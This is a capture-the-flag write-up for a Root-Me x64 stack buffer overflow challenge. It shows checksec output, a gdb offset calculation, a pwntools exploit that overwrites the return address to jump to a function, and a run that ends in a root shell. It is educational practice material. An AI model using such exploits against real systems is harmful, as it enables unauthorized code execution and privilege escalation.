root

step

checksec:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

use the address of callMeMaybe to cover the return address of strlen
calc the distance:

Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400728 in main ()
gdb-peda$ pattern_offset A%JA%fA%5A
A%JA%fA%5A found at offset: 280

exploit

from pwn import *
p = process('./ch35')
elf = ELF('ch35')
sh = elf.symbols['callMeMaybe']
payload = 'a'*280 + p64(sh)
print payload
p.sendline(payload)
p.interactive()

run it:

 ⚡ [email protected]  /mnt/hgfs/pwnexc/root-me/x64 stack overflow basic  python exp_ch35.py
[+] Starting local process './ch35': pid 4337
[*] '/mnt/hgfs/pwnexc/root-me/x64 stack overflow basic/ch35'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[email protected]x00x00x00x00x00
[*] Switching to interactive mode
Hello aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaax1b
$ id
uid=0(root) gid=0(root) 组=0(root)
$